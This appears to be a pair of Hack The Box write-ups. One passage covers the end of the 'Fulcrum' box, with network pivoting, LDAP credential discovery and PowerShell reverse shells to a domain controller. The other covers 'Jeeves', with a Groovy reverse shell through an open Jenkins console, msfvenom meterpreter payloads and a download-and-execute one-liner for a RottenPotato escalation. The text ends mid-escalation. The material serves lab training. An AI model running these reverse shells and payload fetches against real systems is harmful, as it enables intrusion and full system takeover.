? (192.168.122.228) at 52:54:00:74:9d:17 [ether] on virbr0

We see that there is a live host at 192.168.122.228. Our next step was to discover what ports were open on this machine. There are many ways to scan a machine when you are on someone’s internal network, but I prefer to drop a statically compiled version of nmap (and associated modules) if I have the ability to do so. It saves time, and I want to feel at home when I’m on someone’s box.

www-data@Fulcrum:/tmp/.scan$ wget http://10.10.15.74:6666/nmap.tar.gz
--2018-06-22 03:30:11--  http://10.10.15.74:6666/nmap.tar.gz
Connecting to 10.10.15.74:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4875842 (4.6M) [application/gzip]
Saving to: 'nmap.tar.gz'

nmap.tar.gz         100%[===================>]   4.65M  1.04MB/s    in 6.8s

2018-06-22 03:30:19 (705 KB/s) - 'nmap.tar.gz' saved [4875842/4875842]

www-data@Fulcrum:/tmp/.scan$ clear
TERM environment variable not set.
www-data@Fulcrum:/tmp/.scan$ ls
nmap.tar.gz
www-data@Fulcrum:/tmp/.scan$ tar -xvf nmap.tar.gz
...[snip]...

Downloading our statically compiled nmap

www-data@Fulcrum:/tmp/.scan$ wget http://10.10.15.74:6666/nmapstatic
--2018-06-22 03:36:28--  http://10.10.15.74:6666/nmapstatic
Connecting to 10.10.15.74:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5944464 (5.7M) [application/octet-stream]
Saving to: 'nmapstatic'

nmapstatic          100%[===================>]   5.67M   576KB/s    in 11s

2018-06-22 03:36:40 (506 KB/s) - 'nmapstatic' saved [5944464/5944464]

To scanning with our statically compiled nmap, we use the --datadir option, with this we can portscan just like if we were doing it from our own box easily.

www-data@Fulcrum:/tmp/.scan$ ./nmapstatic --datadir nmap/ -p- 192.168.122.228

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2018-06-22 03:39 BST
Nmap scan report for 192.168.122.228
Host is up (0.0022s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
5986/tcp open  wsmans
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 165.06 seconds

Like we thought, there seems to be a windows host attached with Powershell remoteing enabled.

Pivoting from Fulcrum Host to 192.168.122.x Network

To use PSRemoteing from my host machine properly, we are going to need to setup a pivot. The general gist of what we need to accomplish can be expressed with this diagram.

I’m going to use socat for a majority of this because it’s a tool I am very familiar with, and it’s pretty easy to use. Although you can achieve the same results, using Metasploit, ssh, or some other like-minded tool.

We are going to listen for connections on port 55555 -> and relay that connection to 192.168.122.228 on port 5986 (PSRemoting port).

on fulcrum machine (10.10.10.62)

www-data@Fulcrum:/tmp/ ./socat tcp-listen:55555,reuseaddr,fork tcp:192.168.122.228:5986

on my kali box (192.168.30.130)

What is this doing is that it’s going to listen for connections on port 5986 -> and relay that connection to 10.10.10.62 on port 55555.

root@dastinia:~# socat tcp-listen:5986,reuseaddr,fork tcp:10.10.10.62:55555

Now from my (local) Windows 10 host we can connect to my Kali host (192.168.30.130), and it will relay that connection through our pivots to the network we are attempting to reach. We need the additional -SessionOption’s SkipCACheck -SkipCNCheck because you get two error messages stating that The SSL certificate is signed by an unknown certificate authority. & The SSL certificate contains a common name (CN) that does not match the hostname.

PS C:\> Enter-PSSession -Computername 192.168.30.130 -Credential "Webuser" -UseSSL -SessionOption (New-PSSessionOption -SkipCACheck -SkipCNCheck)
[192.168.30.130]: PS C:\Users\WebUser\Documents> $env:UserName
WebUser
[192.168.30.130]: PS C:\Users\WebUser\Documents> $env:UserDomain
WEBSERVER

Pivoting from WebServer to FileServer

If you attempt to read the contents of the user flag, you get a message stating that You need to go deeper!. Inspecting the CheckFileServer.ps1 powershell script, we can see that they are hinting that most likely there is another host on the network.

[192.168.30.130]: PS C:\Users\WebUser\Documents> dir


    Directory: C:\Users\WebUser\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/2/2017   8:39 PM            260 CheckFileServer.ps1
-a----       10/12/2017   4:23 AM          33266 Invoke-PsExec.ps1
-a----        10/2/2017   8:23 PM             24 user.txt



[192.168.30.130]: PS C:\Users\WebUser\Documents> type .\user.txt
You need to go deeper!

[192.168.30.130]: PS C:\Users\WebUser\Documents> type .\CheckFileServer.ps1
$Server = '127.0.0.1' # Waiting on IT to give me the address...
$Creds = Get-Credential -Message 'Please enter file server credentials'

Get-CimClass -ClassName win32_operatingsystem -ComputerName $Server -Credential $Creds

# TODO: can't get this to work

Since the hostname of this system is “WebServer” we should probably inspect the contents of the webroot… Inspecting the contents of the web.config we find credentials which looks like it will allow us to run LDAP queries.

[192.168.30.130]: PS C:\inetpub\wwwroot> dir


    Directory: C:\inetpub\wwwroot


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/2/2017   8:09 PM           5359 index.htm
-a----        10/2/2017   8:11 PM           1310 web.config


[192.168.30.130]: PS C:\inetpub\wwwroot> type web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration xmlns="http://schemas.microsoft.com/.NetConfiguration/v2.0">
    <appSettings />
    <connectionStrings>
        <add connectionString="LDAP://dc.fulcrum.local/OU=People,DC=fulcrum,DC=local" name="ADServices" />
    </connectionStrings>
    <system.web>
        <membership defaultProvider="ADProvider">
            <providers>
                <add name="ADProvider" type="System.Web.Security.ActiveDirectoryMembershipProvider, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" connectionStringName="ADConnString" connectionUsername="FULCRUM\LDAP" connectionPassword="PasswordForSearching123!" attributeMapUsername="SAMAccountName" />
            </providers>
        </membership>
    </system.web>
...[snip]...
[192.168.30.130]: PS C:\inetpub\wwwroot>

Querying LDAP for Information

At the time, I didn’t bother writing a proper ldap queries, so I did the un-elegant method of just running an ldap query for absolutely every object/filter, and manually inspecting it for interesting information.

Querying LDAP in Powershell

$username = 'LDAP'
$password = 'PasswordForSearching123!'
$DomainControllerIpAddress = 'dc.fulcrum.local'
$LdapDn = 'dc=fulcrum,dc=local'
$dn = New-Object System.DirectoryServices.DirectoryEntry ("LDAP://$($DomainControllerIpAddress):389/$LdapDn",$username,$password)
$ds = new-object System.DirectoryServices.DirectorySearcher($dn)
$ds.filter = "((ObjectClass=*))"
$ds.SearchScope = "subtree"
$ds.PropertiesToLoad.Add("distinguishedName")
$ds.PropertiesToLoad.Add("sAMAccountName")
$ds.PropertiesToLoad.Add("lastLogon")
$ds.PropertiesToLoad.Add("memberOf")
$ds.PropertiesToLoad.Add("distinguishedname")
$ds.FindAll()

Output:

...[snip]...
LDAP://dc.fulcrum.local:389/CN=FILE,CN=Computers,DC=fulcrum,DC=local                                                                             {distinguishedname, samaccountname, adspath, lastlogon}
LDAP://dc.fulcrum.local:389/CN=Bobby Tables,OU=People,DC=fulcrum,DC=local                                                                        {distinguishedname, samaccountname, adspath, lastlogon}
LDAP://dc.fulcrum.local:389/OU=People,DC=fulcrum,DC=local                                                                                        {distinguishedname, adspath}
LDAP://dc.fulcrum.local:389/CN=LDAP Lookup,OU=People,DC=fulcrum,DC=local                                                                         {distinguishedname, samaccountname, adspath, lastlogon}
LDAP://dc.fulcrum.local:389/CN=be36,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=8631,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=9791,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=879f,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=953d,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=81b2,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=97f0,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}

From the output of our LDAP query we can see some interesting objects, include the name of the fileserver: file.fulcrum.local , and a user different from the rest of the users “Bobby Tables”. We can run a more filtered query on the common name (CN) “bobby”, and we can now include all the properties mapped to this object.

$username = 'LDAP'
$password = 'PasswordForSearching123!'
$DomainControllerIpAddress = 'dc.fulcrum.local'
$LdapDn = 'dc=fulcrum,dc=local'
$dn = New-Object System.DirectoryServices.DirectoryEntry ("LDAP://$($DomainControllerIpAddress):389/$LdapDn",$username,$password)
$ds = new-object System.DirectoryServices.DirectorySearcher($dn)
$ds.filter = "((cn=bobby*))"
$ds.SearchScope = "subtree"
$ds.PropertiesToLoad.Add("*")
$data = $ds.FindAll()
$data.Properties

Doing so gives us the following output…

Name                           Value
----                           -----
logoncount                     {18}
codepage                       {0}
objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}
description                    {Has logon rights to the file server}
usnchanged                     {143447}
instancetype                   {4}
name                           {Bobby Tables}
badpasswordtime                {131522885566857829}
pwdlastset                     {131514417841217344}
objectclass                    {top, person, organizationalPerson, user}
badpwdcount                    {0}
samaccounttype                 {805306368}
lastlogontimestamp             {131556801131693417}
usncreated                     {12878}
objectguid                     {88 53 29 79 114 147 100 75 187 41 125 239 148 113 13 111}
info                           {Password set to ++FileServerLogon12345++}
whencreated                    {10/2/2017 6:06:57 PM}
adspath                        {LDAP://dc.fulcrum.local:389/CN=Bobby Tables,OU=People,DC=fulcrum,DC=local}
useraccountcontrol             {66048}
cn                             {Bobby Tables}
countrycode                    {0}
primarygroupid                 {513}
whenchanged                    {11/20/2017 7:35:13 PM}
dscorepropagationdata          {10/2/2017 6:09:28 PM, 10/2/2017 6:06:57 PM, 1/1/1601 12:00:00 AM}
lastlogon                      {131556801131693417}
distinguishedname              {CN=Bobby Tables,OU=People,DC=fulcrum,DC=local}
samaccountname                 {BTables}
objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 70 111 187 188 76 255 138 170 168 71 215 161 80 4 0 0}
lastlogoff                     {0}
displayname                    {Bobby Tables}
accountexpires                 {9223372036854775807}
userprincipalname              {BTables@fulcrum.local}

It seems that we might we have might discovered Bobby Tables credentials, and from the “description” he should have logon rights to the file server (file.fulcrum.local).

Pivoting to file.fulcrum.local with Nishang

Trying to enter another Powershell Remoting sessions gives us an error stating we can’t do multi-hop PSRemoting Sessions. We also don’t have permissions to enable multi-session PSRemoting unfortunately because we aren’t administrators.


[192.168.30.130]: PS C:\Users\WebUser\Documents> Enter-PSSession -Computername file.fulcrum.local -Credential fulcrum.local\btables
Enter-PSSession : You are currently in a Windows PowerShell PSSession and cannot use the Enter-PSSession cmdlet to enter another PSSession.
    + CategoryInfo          : InvalidArgument: (:) [Enter-PSSession], ArgumentException
    + FullyQualifiedErrorId : RemoteHostDoesNotSupportPushRunspace,Microsoft.PowerShell.Commands.EnterPSSessionCommand

[192.168.30.130]: PS C:\Users\WebUser\Documents> Enable-WSManCredSSP –Role Client –DelegateComputer spoke
Access is denied. You need to run this cmdlet from an elevated process.
    + CategoryInfo          : NotSpecified: (:) [Enable-WSManCredSSP], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.WSMan.Management.EnableWSManCredSSPCommand

We are able to call backout to the htb vpn ip space so we can use powershell invoke-command to execute commands on the box. We can get a reverse shell copy-pasta’ing “Nishangs Invoke-PowershellTcpOneLine” Invoke-Command on file.fulcrum.local

Invoke-Command -ComputerName file.fulcrum.local -Credential fulcrum.local\btables -Port 5985 -ScriptBlock  { $client = New-Object System.Net.Sockets.TCPClient('10.10.15.74',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }

getting shell

root@dastinia:~# ncat -lnvp 53
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 10.10.10.62.
Ncat: Connection from 10.10.10.62:12873.
whoami
fulcrum\btables
PS C:\Users\BTables\Documents>

getting user flag

PS C:\Users\BTables\Desktop> dir


    Directory: C:\Users\BTables\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/4/2017  10:12 PM             34 user.txt


PS C:\Users\BTables\Desktop> type user.txt
...[snip]...

Pivoting to Domain Controller (dc.fulcrum.local)

Exploring the system you discover a myriad of files of which the contents of domain_users.csv appears to be a list of username, and passwords for various domain users.

PS C:\Users\BTables> dir


    Directory: C:\Users\BTables


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        10/4/2017  10:12 PM                Desktop
d-r---        10/9/2017   8:22 PM                Documents
d-r---        7/16/2016   2:18 PM                Downloads
d-r---        7/16/2016   2:18 PM                Favorites
d-r---        7/16/2016   2:18 PM                Links
d-r---        7/16/2016   2:18 PM                Music
d-r---        7/16/2016   2:18 PM                Pictures
d-----        7/16/2016   2:18 PM                Saved Games
d-r---        7/16/2016   2:18 PM                Videos
-a----       10/12/2017   8:09 PM           5502 check-auth.ps1
-a----       10/12/2017   7:48 PM          45011 domain_users.csv
-a----       10/12/2017   7:21 PM          21002 file.txt
-a----       10/12/2017   7:21 PM          21002 file2.txt
-a----       10/12/2017   7:48 PM          45011 merged.txt
-a----       10/12/2017   7:43 PM          90002 merged2.txt
-a----       10/12/2017   7:39 PM          21002 Output.txt
-a----       10/12/2017   7:23 PM          75002 pass.txt
-a----       10/12/2017   7:23 PM          75002 pass2.txt
-a----       10/12/2017   9:16 PM          21000 result.txt
-a----       10/12/2017   9:04 PM             42 test.csv
-a----       10/12/2017   7:14 PM          18002 users.txt
-a----       10/12/2017   7:22 PM              0 wordlist.txt

contents of “domain_users.csv”

...[snip]...
a7e6,@fulcrum_e9f86a021507_$
9cea,@fulcrum_1eee5eabb089_$
9e92,@fulcrum_efecb22c5b82_$
8d25,@fulcrum_70e0e02bd594_$
9923,@fulcrum_17f672dfcc78_$
b0b6,@fulcrum_7a5f2af5237e_$
9e2a,@fulcrum_acd5008a3f9d_$
a700,@fulcrum_47ff4e46a43f_$
b473,@fulcrum_110bf7e71ecd_$
984a,@fulcrum_d254c73f8dab_$

I forgot to mention, but from our either enumeration we could have discovered what users are in the domain admins by querying ldap. I forgot to gather the exact query I used, but to give an baseline idea of what the ldap query structure would have looked like: (&(objectCategory=user)(memberOf=CN=Domain Admins,CN=People,DC=fulcrum,dc=local)), but either way, by bruteforcing the credentials with a script, or querying LDAP you would discover that the user 932a is in the domain administrators group.

PS C:\Users\BTables> type domain_users.csv | findstr "923a"
9f68,@fulcrum_df0923a7ca40_$
923a,@fulcrum_bf392748ef4e_$

getting shell on the domain controller dc.fulcrum.local

Invoke-Command -ComputerName dc.fulcrum.local -Credential 923a -Port 5985 -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.15.74',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }

root@dastinia:~# nc -lnvp 53
listening on [any] 53 ...
connect to [10.10.15.74] from (UNKNOWN) [10.10.10.62] 1559

PS C:\Users\923a\Documents> whoami
fulcrum\923a
PS C:\Users\923a\Documents>whoami /groups

GROUP INFORMATION
-----------------

Group Name                                     Type             SID                                           Attributes
============================================== ================ ============================================= ===============================================================
Everyone                                       Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                  Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access     Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                         Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                           Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users               Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                 Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
FULCRUM\Domain Admins                          Group            S-1-5-21-3166400326-2861236044-2715240360-512 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity     Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
FULCRUM\Denied RODC Password Replication Group Alias            S-1-5-21-3166400326-2861236044-2715240360-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level           Label            S-1-16-12288
PS C:\Users\923a>

Box finally complete :)

PS C:\Users\Administrator\Desktop> type root.txt
...[snip]...

Hack the Box - Jeeves Write up

2018-05-19T00:00:00-04:00

Intro

I honestly had a whole lot of fun with Jeeves. It had multiple ways of attacking/rooting it, while also being a very realistic example of something that you would see the real world. It wasn’t an extremely difficult box, but you definitely had to do a little research to be successful in successfully rooting it. Definitely adding Jeeves to my list of HTB favorites.

Tools Used

Enumeration

Inital Scanning

Like with every box lets start off with an nmap scan on Jeeves(10.10.10.63)…

root@dastinia:~/htb/jeeves# nmap -T4 -sC -sV -n 10.10.10.63 -oA jeeves_initial_scan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-16 08:57 EDT
Nmap scan report for 10.10.10.63
Host is up (0.15s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2018-05-16 13:58:08
|_  start_date: 2018-05-16 11:17:53

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.30 seconds

Small Note: IF you aren’t extremely familiar with windows you can usually tell what version of Windows is running by the version of IIS that’s being displayed. As you can see it’s Microsoft IIS httpd 10.0 which means that this version of windows is likely Windows Server 2016 or Windows 10. It’s not 100% conclusive, but you can get an idea of what you are working with.

A full port scan was ran in the background, but no additional ports/services were discovered.

Enumerating Port 80

Visiting the webserver on port 80 gives us this throwback to the past with an ask jeeves search engine webpage.

There’s a search bar so I input all specicial charaters to see how the “application” parses it…

You are presented with the fake “error page” above, which is just an image of an error page.

Enumerating Port 50000 (Jetty/Jenkins)

Visting the application on port 50000 in a Web browers leads us to a Jetty 404 Error page.

Whenever I encounter an application that error message that looks fairly unique, I always copy & paste the error message into Google and see what happens. This technique is very underrated, google that shit.

We are seeing quite a few results for Jenkins, so there is a high probability that this server is running Jenkins as a service, and now we just have to discover it.

Dirbuster

Next step is to dirbuster everything to discover the jenkins dashboard path. I always use the directory-list-2.3-medium.txt which comes default in kali for most HTB boxes.

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Wed May 16 09:48:14 EDT 2018
--------------------------------

http://10.10.10.63:50000
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/askjeeves/
/askjeeves/people/
/askjeeves/about/
/askjeeves/log/
/askjeeves/computer/
/askjeeves/api/
/askjeeves/log/rss/
/askjeeves/api/xml/
/askjeeves/people/api/
/askjeeves/script/
/askjeeves/api/python/
/askjeeves/people/api/xml/
.... [TRUNCATED] ....
--------------------------------

It looks like /askjeves/ seems to be the correct path for the Jenkins main dashboard, confirming our suspicions that Jenkins is the running service.

Exploitation

Exploiting Jenkins

Jenkins is pretty much code execution as a service, so exploiting it shouldn’t be too much of a hassle. There are a few ways to shell this box so I’ll try and cover the main paths. This particular jenkins server didn’t require authentication to do actions against it which is a pretty big (but common) misconfiguration.

Method 1: Jenkins Script Console

Jenkins has a scripting console, which you can access by going to Manage Jenkins => Script Console

You can write scripts in the Groovy Scripting Language. I searched for groovy script run command example or if you just want to skip straight to the shell search groovy script reverse shell

Testing to see if we have code execution…

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'powershell.exe $PSVERSIONTABLE'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Output:

We confirmed that we have code execution. Now lets shell it.

From my search of groovy script reverse shell, I came across this Github gist – change the host and port parameter to match your settings, and hit “Run” in the script console & you will get a reverse shell.

String host="10.10.15.30";
int port=8282;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Getting Reverse shell via Jenkins Script Console

root@dastinia:~/htb/jeeves# ncat -lnvp 8282
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::8282
Ncat: Listening on 0.0.0.0:8282
Ncat: Connection from 10.10.10.63.
Ncat: Connection from 10.10.10.63:49723.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>whoami /all
whoami /all

USER INFORMATION
----------------

User Name      SID
============== ===========================================
jeeves\kohsuke S-1-5-21-2851396806-8246019-2289784878-1001


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

ERROR: Unable to get user claims information.

Method 2: Build Job Exec Command

With Jenkins you can execute system commands as part of a deployment build job. The Jenkins server allowed anyone to do anything even to the anonymous user which means we can create a malicious deployment & execute our code.

Steps:

Create new Build Job (http://10.10.10.63:50000/askjeeves/view/all/newJob)
Select “FreeStyle Project’
Hit Ok
Select “Build Enviroment”
Generate payload / put the code you want to execute as a build step
Hit Apply
Start Build

You can run any system commands you want in the predeployment step, I used a msfvenom payload just to validate that it’s possible.

root@dastinia:~# msfvenom -p windows/meterpreter/reverse_http LHOST=10.10.15.30 LPORT=8081 -f psh-cmd > 8081.cmd
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 588 bytes
Final size of psh-cmd file: 7111 bytes

Hit Save & Apply

msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf exploit(multi/handler) > set LPORT 8081
LPORT => 8081
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 2.

[*] Started HTTP reverse handler on http://10.10.15.30:8081
msf exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                           Payload opts
  --  ----                    -------                           ------------
  1   Exploit: multi/handler  windows/meterpreter/reverse_tcp   tcp://10.10.15.30:8383
  2   Exploit: multi/handler  windows/meterpreter/reverse_http  http://10.10.15.30:8081

msf exploit(multi/handler) >
[*] http://10.10.15.30:8081 handling request from 10.10.10.63; (UUID: mwj6ua5f) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 2 opened (10.10.15.30:8081 -> 10.10.10.63:49761) at 2018-05-16 15:14:13 -0400

The session may die rapidly, so you may want to make it automigrate, but I prefer the groovy script method since it’s easier. This just validates that you can do it this way if you choose.

Privilege Escalation

Lets run the results of the systeminfo command through GDSSecurity Windows Exploit Suggester,and see if there are any potential exploits/LPE’s we can utilize. This is usually one of the first steps I take when I get on a windows box because you can very quickly determine if you have a path to esclatate your privileges through an exploit, or if you have to discover another way.

C:\Users\kohsuke\Desktop>systeminfo

Host Name:                 JEEVES
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.10586 N/A Build 10586
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00331-20304-47406-AA297
Original Install Date:     10/25/2017, 4:45:33 PM
System Boot Time:          5/16/2018, 2:45:50 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.0.B64.1704110547, 4/11/2017
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 873 MB
Virtual Memory: Max Size:  2,687 MB
Virtual Memory: Available: 1,293 MB
Virtual Memory: In Use:    1,394 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 10 Hotfix(s) Installed.
                           [01]: KB3150513
                           [02]: KB3161102
                           [03]: KB3172729
                           [04]: KB3173428
                           [05]: KB4021702
                           [06]: KB4022633
                           [07]: KB4033631
                           [08]: KB4035632
                           [09]: KB4051613
                           [10]: KB4041689
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.63
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed

It looks like this machine is vulnerable two a few LPE exploits the big ones being MS16-075 (RottenPotato) & MS16-032. From our sysinfo output we can rule out MS16-032 because that particular exploit requires two cpu(s), and this machine has only one cpu.

It looks like this machine is vulnerable to MS16-075 (which I would say is fairly reliable when available), and from our eariler whoami /all command it seems we have everything in place to successfully execute this exploit.

Method 1: MS16-075 “RottenPotato”

The steps to successfully exploit MS16-075 “rotten potato” (with meterpreter) is:

Have meterpreter shell
Upload RottenPotato/potato exploit executeable
Load ignognito on meterpreter session
Execute rottenpotato executable
Impersonate NT Authority/SYSTEM token
You are now system.

Powershell 1-liner for download + executing file (getting meterpreter shell):

powershell -exec bypass -c "(New-Object Net.WebClient).DownloadFile('http://10.10.15.30:9999/8383.exe','8383.exe')";Start-Process '8383.exe'

On Jeeves Host

C:\Users\Administrator\.jenkins>cd %appdata%

C:\Users\kohsuke\AppData\Roaming>powershell -exec bypass -c "(New-Object Net.WebClient).DownloadFile('http://10.10.15.30:9999/8383.exe','8383.exe')";Start-Process '8383.exe'

C:\Users\kohsuke\AppData\Roaming>

Attack Box

msf >
[*] Sending stage (179779 bytes) to 10.10.10.63
[*] Meterpreter session 4 opened (10.10.15.30:8383 -> 10.10.10.63:49682) at 2018-05-16 17:07:54 -0400

msf >
msf > sessions

Active sessions
===============
  Id  Name  Type                    Information              Connection  
  --  ----  ----                     -----------              ----------  
  2         meterpreter x86/windows                           10.10.15.30:8081 -> 10.10.10.63:49761 (10.10.10.63)  
  4         meterpreter x86/windows  JEEVES\kohsuke @ JEEVES  10.10.15.30:8383 -> 10.10.10.63:49682 (10.10.10.63)

Completing the required steps for the exploit

meterpreter > upload /opt/serve/windows/priv/rottenpotato.exe
[*] uploading  : /opt/serve/windows/priv/rottenpotato.exe -> rottenpotato.exe
[*] Uploaded 664.00 KiB of 664.00 KiB (100.0%): /opt/serve/windows/priv/rottenpotato.exe -> rottenpotato.exe
